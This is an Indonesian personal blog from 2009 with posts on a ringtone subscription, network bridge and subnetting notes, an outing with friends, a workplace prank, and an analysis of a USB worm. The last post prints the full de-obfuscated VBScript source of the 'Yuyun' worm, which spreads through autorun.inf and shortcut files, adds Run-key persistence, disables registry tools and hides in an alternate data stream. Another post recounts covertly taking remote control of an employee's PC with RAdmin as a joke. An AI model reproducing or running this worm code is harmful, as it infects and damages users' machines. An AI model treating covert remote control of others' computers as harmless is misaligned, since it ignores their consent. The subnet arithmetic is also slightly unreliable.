Subscribe

RSS Feed (xml)

Powered By

Skin Design:
Free Blogger Skins

Powered by Blogger

Selasa, 17 Februari 2009

UNREG 808

Seminggu yang lalu saya dapat tawaran i-Ring gratis dari 808. Dalam tawaran itu kita bisa pasang custom nada dering secara gratis selama 1 minggu. Wah tawaran yang menarik, tentu ga rugi klo kita ambil. Sebenarnya ga penting bgt gtu masang i-Ring di no saya. Waktu itu saya dah mikir, pasti ada kebusukan yang tersimpan di tawaran itu, yaitu memanfaatkan kelengahan user. Jadi saya pasang reminder di HP untuk unreg sebelum batas gratis.
Seminggu hampir berlalu, dan reminder di HP mengingatkan untuk unreg. Tapi saya ga tau gimana cara unreg, dan ndilalah waktu itu saya sibuk jadi lupa cari di Internet caranya. Dan akhirnya, hari ini ada sms:
JukeBox Anda telah di perpanjang sampai tgl 25/02/2009. Perpanjangan berlaku otomatis stlh 7 hari, biaya Rp.2900+PPN10%.
Jadi...kena deh! Nilai sih ga seberapa, tapi mangkelnya itu loh. Tapi emang saya akui pasti cara seperti ini muncul dari pemikiran ahli bisnis dan pemasaran. Tentu saja mereka berada di group penganut paham kapitalis yang gak mempermasalahkan uang yang masuk di kantong merika dari cara yang bener apa cara yang busuk. Liat aja bahasanya: Perpanjangan berlaku otomatis. Sama aja secara otomatis setiap 7 hari uang masuk ke kantong mereka, gak peduli apakah itu "mencuri" atau memang diberikan. Sebenernya ga jauh dengan "menggendam" orang sih. Klo perpanjangan SIM sih ga apa otomatis, gw bayar deh biayanya. Nah ini iRing dengan suara radio transistor mono aja dibelain...
Dari cara promosi mereka paling tidak jika ada 1 juta user baru yang apply iRing maka tentu mendapat omset penjualan 3M! Trus jika selanjutnya user lupa untuk unreg lagi....hahaha berulang lagi deh.
Jangan lupa!! Unreg, dengan cara ketik UNREG ke 808

Minggu, 15 Februari 2009

Ealah yo yo...

Ternyata cuma gini tok! Dulu pas kuliah gak jelas sih, coba ngerti prinsipnya...gampang bgt!

Advantages of network bridges

  • Self configuring
  • Primitive bridges are often inexpensive
  • Reduce size of collision domain by microsegmentation in non switched networks
  • Transparent to protocols above the MAC layer
  • Allows the introduction of management - performance information and access control
  • LANs interconnected are separate and physical constraints such as number of stations, repeaters and segment length don't apply
  • it also helps minimize high bandwidth

Disadvantages of network bridges

  • Does not limit the scope of broadcasts
  • Does not scale to extremely large networks
  • Buffering introduces store and forward delays - on average traffic destined for bridge will be related to the number of stations on the rest of the LAN
  • Bridging of different MAC protocols introduces errors
  • Because bridges do more than repeaters by viewing MAC addresses, the extra processing makes them slower than repeaters
Subnetting
Kemarin saya bingung artinya /24 di belakang ip tuh apa. Ternyata itu jumlah bit yang dipakai untuk mengidentifikasi ip network. Jadi klo ada tulisan /24 artinya net masknya: 11111111 11111111 11111111 0000000 = 255.255.255.0
Coba lihat, bit satunya ada 24 bit. Untuk menghitung jumlah host, tinggal di ubah aja bit-bit nol menjadi 1 dan bit 1 menjadi nol, ya itu lah total host yang tersedia. Jadi /24 akan menhasilkan jumlah host 255 (254 available)

Cangkrukan...

Hari minggu ku turut ayah ke kota...
Eh salah, itu mah lagu pas TK. Ceritanya minggu gue ada acara --sensor1-- di --sensor2--. Kebetulan di acara itu aku akan ketemu teman lawas. Dah hampir 4 tahun mungkin ga pernah ketemu. Begitu ketemu, langsung ketawa-ketiwi. Seneng aja gtu, bisa ketemu lagi, bisa cerita-cerita. Setelah acara --sensor1-- eh ternyata udah menunggu sahabat ku yang satunya lagi...itu tuh si tis tis, jadi deh sama aja copy darat hahha. Tapi bukan buaya darat loh. Eh ternyata hujan, jadi deh kita nunggu sampai hujan reda.
Mungkin ini ya yang dinamakan sahabat. Yah moga-moga persahabatan ini membawa kebaikan bagi kita semua. ^_^



Jumat, 13 Februari 2009

Hantu RAdmin

Hi...
Sore-sore gini lagi ngelamun liatin laptop, loh koq cursor mousenya gerak sendiri. Sempat kaget sih, trus sadar ternyata gara-gara mousenya salah naruh. Eh aku koq jadi inget kejadian di Jember deh.
Ceritanya waktu itu ada project di Jember, lagi proses install aplikasi ke client-client. Untuk mempermudah setting, kita install RAdmin di setiap komputer user. Pas lagi santai, kita liat ada karyawan perusahaan itu yang main game. Kebetulan tempat kita lagi ngumpul di ruang server, ruangannya gelap jadi orang ga tau kalo kita lagi memperhatikan luar. Langsung deh muncul ide nakal dari mr Dayat, dia remot komputer yang dibuat main game. Trus mouse nya di gerak-gerakkan. Tentu aja karyawan yang lagi main game itu bingung. Koq gerak sendiri. Sambil cekikikan kita liat dia coba bersihkan mouse nya. Kita makin semangat, kali ini kita coba close game yang lagi di mainkan. Dia makin bingung. Hahahhhah...
Pas makan siang, dia cerita katanya komputernya gerak-gerak. Trus di hubungkan dengan mahkluk halus...hehehe. Kita bilang aja, paling mouse nya. Katanya, gak koq, masa klo mouse rusak dia bisa gerak ke pojok trus close programnya. Langsung deh kita ketawa ngakak hahahhahahaha. Sampe sekarang dia ga tau kalau kita yang ngerjain....

Rabu, 04 Februari 2009

Dalaman virus Sortcut

Barusan teman kantor laptopnya ada yang kena virus. Modelnya dia buat sortcut di setiap folder dengan nama Microsoft.lnk, New Folder.lnk dan [Nama Folder].lnk. Wah saya belum pernah nih dapet virus seperti ini. Trus saya coba cari di internet, ternyata namanya virus sortcut, atau kadang juga disebut virus Hery Potter. Virus ini menggunakan windows script untuk mengeksekuis dirinya sendiri. Untuk lebih detailnya coba intip di sini
Di blog ini saya lebih tertarik menunjukkan jeroannya virus ini. Saya coba buka file Thumb.db Trus di situ ada beberapa script yang bisa di eksekusi via vbscript. (Windows script). Tapi ada bagian yang di "enkripsi" xor. Setelah saya buka, ini dalamannya ^_^
======================================================= My name : Yuyun Ver 1.0 I just wanna see every girl looks nice, better, kinds especially a moslem girl by: Anonymouse in Jatim, November 2008 When I found nothing beauty else... and then I wrote this script for all=======================================================On' Error Resume NextDim' fso, ws, status,status1, flyset' fso = CreateObject("scripting.filesystemobject")set' ws = CreateObject("wscript.Shell")set' sh = CreateObject("Shell.application")set' net = CreateObject("wscript.network")fly=falsetmp=fso.GetSpecialFolder(2)tn=fso.GetTempNametmpt=tmp+"\"+tndocx=ws.SpecialFolders("MyDocuments")set' swt=WScript.ArgumentsIf' swt.Count>0 Then status=swt(0)End' IfIf' fso.fileexists(tmp+"\Yuyun.Q") then set ira=fso.getfile(tmp+"\Yuyun.Q") ira.attributes=0 ira.name="shalihah.ira" if ira.name="shalihah.ira" then ira.name="Yuyun.Q" set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true) else fly=true end ifelse set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)End' ifset' AQ=fso.GetFile(status)If' fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0AQ.Copy tmpt,Trueset' AQ=fso.GetFile(tmpt)AQ.Attributes=39anv=tmp+"\auto.exe"If' Not fso.FileExists(anv) Then AQ.Copy anvset' auto=fso.GetFile(anv) auto.attributes=0set' aut=fso.OpenTextFile(anv,2,True,0)isi="[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto"isi=Replace(isi,">",vbCrLf)aut.Write isiaut.Closeauto.Attributes=39ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"AQ.Copy ltkc+"\thumb.db",Trueauto.Copy ltkc+"\autorun.inf",TrueIf' fso.FileExists(docx+"\database.mdb") Then fso.GetFile(docx+"\database.mdb").Attributes=0AQ.Copy docx+"\database.mdb",TrueregQset' rara=UNISKAHertz FalseIf' Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3call' attack_netHertz TrueSub' rekursif(path,dp)On' Error Resume Nextdropf' pathwscript.sleep 50If' dp>0 ThenFor' Each fldr1 In fso.GetFolder(path+"\").SubFolders rekursif fldr1.Path, dp-1NextEnd' IfEnd' SubSub' dropf(path)On' Error Resume NextIf' day(now)=1 and (month(now)mod 3)=1 then rara.copy path+"\Baca AQ.rtf"rara.copy path+"\My name is Yuyun.rtf"End' ifg1=path+"\autorun.inf"g2=path+"\Thumb.db"If' fso.FileExists(g1) Then Set g11=fso.GetFile(g1) If g11.Attributes<>39 Then g11.Attributes=0 auto.Copy path+"\autorun.inf",True end ifelse' auto.Copy path+"\autorun.inf",TrueEnd' ifIf' fso.FileExists(g2) Then Set g12=fso.GetFile(g2) If g12.Attributes<>39 Then g12.Attributes=0 AQ.Copy path+"\Thumb.db",True end ifelse AQ.Copy path+"\Thumb.db",TrueEnd' IfIf' Not fso.FileExists(path+"\Microsoft.lnk") ThenshorZvnita path+"\Microsoft","Microsoft"drop=Array("New Harry Potter and...","New Folder","SuratQ","Rahasia","Game","Zvnita","Download","DataQ","DataQ")ww=1For' Each d In drop If Day(now) Mod 3 = ww Then shorZvnita path+"\"+d,d wscript.sleep 60 ww=ww+1Nextr=0For' Each fldr In fso.GetFolder(path+"\").SubFolders shorZvnita path+"\"+fldr.name,fldr.Name wscript.sleep 60If' r>3 Then Exit ForEnd' ifr='r'+'1NextEnd' IfEnd' SubSub' shorZvnita(path,trgt)set' shor=ws.CreateShortcut(path+".lnk")shor.iconlocation="shell32.dll,3"shor.targetpath="wscript.exe"shor.arguments="//e:VBScript thumb.db """+trgt+""""shor.saveEnd' Subfunction' attack_net() On Error Resume Next err.clear Set objFolder = sh.Namespace(&H13&) Set colItems = objFolder.Items For Each strFileName in objFolder.Items t= objFolder.GetDetailsOf(strFileName, 14) if fso.folderexists(t) then rekursif t,4 end if NextEnd' functionSub' tdr()On' Error Resume Nexterr.clearWScript.Sleep 180000If' err.number>0 then wscript.quitEnd' Subfunction' UNISKA()On' error resume nextx=vbcrlfadv="Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^! www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)"adv=replace(adv,">",x)set' Yu2n=fso.opentextfile(tmp+"\v.doc",2,true)Yu2n.write advYu2n.closeIf' day(now)=1 and (month(now)mod 3)=1 then If' fly=false thenFor' i=1 to 3ws.run "notepad.exe /p """+tmp+"\v.doc"""nextEnd' ifEnd' ifset' UNISKA=fso.getfile(tmp+"\v.doc")End' functionSub' regQ()On' Error Resume NextIf' day(now)=1 thenws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Yuyun_Cantix"ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""End' ifws.regdelete "HKCR\lnkfile\IsShortcut"ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+docx+"\database.mdb"""ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"If' lcase(fso.getdrive("c:").FileSystem)="ntfs" theniraQ=AQ.openastextstream(1,0).read(AQ.size)www=fso.GetSpecialFolder(0)set' jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)jjk.write iraQjjk.closews.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""End' ifEnd' SubSub' Hertz(ooo)On' Error Resume NextdoFor' Each drv In fso.DrivesIf' drv.DriveType=1 Thenrekursif' drv.Path,4elserekursif' drv.Path,2End' ifNextIf' fly=false then tdrelse' wscript.quitEnd' ifregQIf' ooo=False Then Exit DoEnd' IfloopEnd' Sub
Moga-moga bermanfaat :)